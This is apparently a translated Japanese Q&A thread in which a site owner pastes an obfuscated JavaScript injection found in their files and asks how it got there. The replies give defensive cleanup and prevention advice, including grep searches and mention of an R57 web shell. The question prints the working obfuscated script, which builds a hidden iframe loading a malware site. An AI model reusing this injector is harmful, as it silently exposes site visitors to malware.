1

どうやってそれらを入手したのですか? また、今後これを回避するにはどうすればよいですか?

#8f4d8e#
echo "<script type=\"text/javascript\" language=\"javascript\" >ff=String;fff=\"fromCharCode\";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v=\"eval\";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0145,0163,0170,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155,0145,047,051,073,015,012,015,012,040,040,040,040,0145,0163,0170,056,0163,0162,0143,040,075,040,047,0150,0164,0164,0160,072,057,057,0141,0142,0163,0157,0154,0165,0164,0145,0147,0151,0146,0164,056,0143,0157,0155,057,0137,0160,0162,0151,0166,0141,0164,0145,057,0143,0154,0153,056,0160,0150,0160,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0160,0157,0163,0151,0164,0151,0157,0156,040,075,040,047,0141,0142,0163,0157,0154,0165,0164,0145,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0142,0157,0162,0144,0145,0162,040,075,040,047,060,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0150,0145,0151,0147,0150,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0167,0151,0144,0164,0150,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0154,0145,0146,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0145,0163,0170,056,0163,0164,0171,0154,0145,056,0164,0157,0160,040,075,040,047,061,0160,0170,047,073,015,012,015,012,040,040,040,040,0151,0146,040,050,041,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0145,0163,0170,047,051,051,040,0173,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0167,0162,0151,0164,0145,050,047,074,0144,0151,0166,040,0151,0144,075,0134,047,0145,0163,0170,0134,047,076,074,057,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0145,0163,0170,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0145,0163,0170,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+478!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(v)xz(s)}</script>";
#/8f4d8e#
4

3 に答える 3

3

マルウェアの配布元であるabsolutegift dot comへのリダイレクトまたはコンテンツの挿入を行っているようです。誰かがあなたのサーバーにアップロードしました。この人 (またはボット) があなたのパスワードを取得したか、エクスプロイトを使用した可能性があります。パスワードを変更し、すべてのユーザー入力 (アップロードを含む) が検証されていることを確認してください。ファイアウォールが実行されていることを確認し (csf をお勧めします)、サーバーでルートキットをスキャンします。

于 2013-03-19T21:43:59.900 に答える
0

これは、Drupal 5を実行している古いサイトでも発生しました。サイトをダウンロードし、meld(Linux用のグラフィカルな差分ツール)を使用してコードベースのクリーンコピーと比較しました。サブディレクトリの1つに配置され、 R57というphpスクリプトを含むgod.phpというファイルがあることがわかりました。このことができるのは本当に怖いです。私のファイルの多くは、次のようなものに感染していました。

<?php
#8f4d8e#
...
#/8f4d8e#
?>

これを手動で数回クリーンアップしましたが、「god.php」ファイルを削除するまでハッキングされ続けました。私はそれがあなたのシステムで異なって呼ばれるかもしれないと思います。サーバーへのSSHアクセスがある場合は、ドキュメントルートに移動し、文字列を含むすべてのファイルを検索します。

grep -R "#8f4d8e#" .

god.phpファイルのバージョンを探すこともできます...たとえば、次のように発行して、R57の痕跡を探します。

grep -R "R57" .

私のファイルの先頭には、バグの大きなアスキーアートの絵がありました。

どうやって入手したのかはわかりませんが、悪い点のリストがありました。更新されていない非常に古いバージョンのDrupal、register_globalsがオンになっているPHP4、共有ホスティング(そしておそらくお粗末な会社)です。

私がしたことは、クリーンアップしたサイトをPHP 5を使用する別のホスティング会社に移動し、すべてのパスワード(drupal、ftp、mysqlなど)を変更することです。

于 2013-03-23T14:44:20.243 に答える
0

ホスティング プロバイダーに連絡し、問題を通知してください。 これは非常に重要 です。侵害され、所有者がすべてのデータを失ったため、多くの合法的な Web サイトをシャットダウンしました。

  • Drupal、Wordpress などの CMS を使用している場合は、必ず管理者パスワードをアップグレードして変更してください。プラグインがある場合は、それらがアップグレードされていることを確認してください。
  • CMS を使用していない場合は、FTP とコントロール パネルのパスワードを変更します。

問題の修正について。CMS を使用している場合は、インプレース アップグレードですべてのファイルを置き換える必要があります。そうでない場合は、すべてのファイルをダウンロードし、Notepad++ などのワード プロセッサを使用して、ディレクトリ全体で検索と置換を行うことができます。 また、ホスティングプロバイダーはバックアップから復元できるか、少なくとも修正の経験がある可能性があります.


それを防ぐには、CMS を使用せず、Web セキュリティについて学んでください。おそらくペンテスターを雇う。

于 2013-03-19T21:55:54.763 に答える